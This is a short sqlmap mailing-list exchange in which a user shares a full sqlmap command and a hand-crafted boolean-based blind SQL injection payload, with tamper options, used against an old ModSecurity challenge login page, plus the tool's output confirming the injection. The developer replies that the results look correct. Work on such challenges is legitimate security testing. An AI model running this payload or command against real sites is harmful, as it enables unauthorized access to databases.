Hi Marcell.
And what makes you think that you are not getting right results? There
results you've sent look quite right.
Kind regards,
Miroslav Stampar
On Fri, May 31, 2013 at 10:34 AM, Marcell Fodor <fodor.em...@gmail.com>wrote:
> Heya,
>
> I had some time to play arround with and old medsecurity challange here:
> http://www.modsecurity.org/zero.webappsecurity.com/
>
> I did make this work under sqlmap:
>
> python ./sqlmap.py -u "
> http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data
> "login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum"
> --string "Object moved" --technique "b" --dbms "msaccess" --tamper
> "space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64;
> rv:21.0) Gecko/20100101 Firefox/21.0"
>
> I had to remove %0C from space2randomblank to make this work.
>
> Response:
>
> Place: (custom) POST
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: login=asd'and(1)like(DateValue(iif(1=1 AND
> 5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum
> --
>
> Is the challange way outdated or something I do wrong?
>
> M
>
>
>
>
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users